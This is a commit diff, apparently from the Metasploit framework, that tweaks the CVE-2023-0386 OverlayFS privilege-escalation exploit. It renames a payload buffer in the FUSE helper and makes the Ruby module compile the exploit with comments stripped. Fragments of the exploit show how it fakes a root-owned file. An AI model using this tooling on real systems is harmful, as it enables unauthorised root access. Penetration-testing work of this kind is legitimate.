Strip_comments

Takahiro-Yoko · Takahiro-Yoko · commit fd7321dd3f68 · 2024-09-06T22:58:31.000+09:00
diff --git a/data/exploits/CVE-2023-0386/cve-2023-0386 b/data/exploits/CVE-2023-0386/cve-2023-0386
diff --git a/external/source/exploits/CVE-2023-0386/exploit.c b/external/source/exploits/CVE-2023-0386/exploit.c
@@ -13,7 +13,7 @@
 #include <unistd.h>
 #include <signal.h>
 
-char shell[0x100000];
+char SHELL[0x5000000];
 
 #define STR_LENGTH 500
 char DIR_BASE[STR_LENGTH];
@@ -43,7 +43,7 @@ static int getattr_callback(const char *path, struct stat *stbuf)
         stbuf->st_nlink = 1;
         stbuf->st_uid = 0;
         stbuf->st_gid = 0;
-        stbuf->st_size = sizeof(shell);
+        stbuf->st_size = sizeof(SHELL);
         return 0;
     }
     else if (strcmp(path, "/") == 0)
@@ -82,17 +82,17 @@ static int read_callback(const char *path,
     char tmp;
     if (strcmp(path, "/file") == 0)
     {
-        size_t len = sizeof(shell);
+        size_t len = sizeof(SHELL);
         if (offset >= len)
             return 0;
         if ((size > len) || (offset + size > len))
         {
-            memcpy(buf, shell + offset, len - offset);
+            memcpy(buf, SHELL + offset, len - offset);
             return len - offset;
         }
         else
         {
-            memcpy(buf, shell + offset, size);
+            memcpy(buf, SHELL + offset, size);
             return size;
         }
     }
@@ -180,7 +180,7 @@ int main(int argc, char const *argv[])
         fatal("open payload");
     }
     int clen = 0;
-    while (read(fd, shell + clen, 1) > 0)
+    while (read(fd, SHELL + clen, 1) > 0)
         clen++;
     close(fd);
 
diff --git a/modules/exploits/linux/local/cve_2023_0386_overlayfs_priv_esc.rb b/modules/exploits/linux/local/cve_2023_0386_overlayfs_priv_esc.rb
@@ -117,7 +117,7 @@ def exploit
 
     if live_compile?
       vprint_status('Live compiling exploit on system...')
-      upload_and_compile("#{exploit_dir}/cve-2023-0386", exploit_source('CVE-2023-0386', 'exploit.c'), '-D_FILE_OFFSET_BITS=64 -lfuse -ldl -pthread')
+      upload_and_compile("#{exploit_dir}/cve-2023-0386", strip_comments(exploit_source('CVE-2023-0386', 'exploit.c')), '-D_FILE_OFFSET_BITS=64 -lfuse -ldl -pthread')
     else
       vprint_status('Dropping pre-compiled exploit on system...')
       upload_and_chmodx("#{exploit_dir}/cve-2023-0386", exploit_data('CVE-2023-0386', 'cve-2023-0386'))

Original file line number	Diff line number	Diff line change
`@@ -13,7 +13,7 @@`
`13`	`13`	`#include <unistd.h>`
`14`	`14`	`#include <signal.h>`
`15`	`15`
`16`		`-char shell[0x100000];`
	`16`	`+char SHELL[0x5000000];`
`17`	`17`
`18`	`18`	`#define STR_LENGTH 500`
`19`	`19`	`char DIR_BASE[STR_LENGTH];`
`@@ -43,7 +43,7 @@ static int getattr_callback(const char path, struct stat stbuf)`
`43`	`43`	`stbuf->st_nlink = 1;`
`44`	`44`	`stbuf->st_uid = 0;`
`45`	`45`	`stbuf->st_gid = 0;`
`46`		`- stbuf->st_size = sizeof(shell);`
	`46`	`+ stbuf->st_size = sizeof(SHELL);`
`47`	`47`	`return 0;`
`48`	`48`	`}`
`49`	`49`	`else if (strcmp(path, "/") == 0)`
`@@ -82,17 +82,17 @@ static int read_callback(const char *path,`
`82`	`82`	`char tmp;`
`83`	`83`	`if (strcmp(path, "/file") == 0)`
`84`	`84`	`{`
`85`		`- size_t len = sizeof(shell);`
	`85`	`+ size_t len = sizeof(SHELL);`
`86`	`86`	`if (offset >= len)`
`87`	`87`	`return 0;`
`88`	`88`	`if ((size > len) \|\| (offset + size > len))`
`89`	`89`	`{`
`90`		`- memcpy(buf, shell + offset, len - offset);`
	`90`	`+ memcpy(buf, SHELL + offset, len - offset);`
`91`	`91`	`return len - offset;`
`92`	`92`	`}`
`93`	`93`	`else`
`94`	`94`	`{`
`95`		`- memcpy(buf, shell + offset, size);`
	`95`	`+ memcpy(buf, SHELL + offset, size);`
`96`	`96`	`return size;`
`97`	`97`	`}`
`98`	`98`	`}`
`@@ -180,7 +180,7 @@ int main(int argc, char const *argv[])`
`180`	`180`	`fatal("open payload");`
`181`	`181`	`}`
`182`	`182`	`int clen = 0;`
`183`		`- while (read(fd, shell + clen, 1) > 0)`
	`183`	`+ while (read(fd, SHELL + clen, 1) > 0)`
`184`	`184`	`clen++;`
`185`	`185`	`close(fd);`
`186`	`186`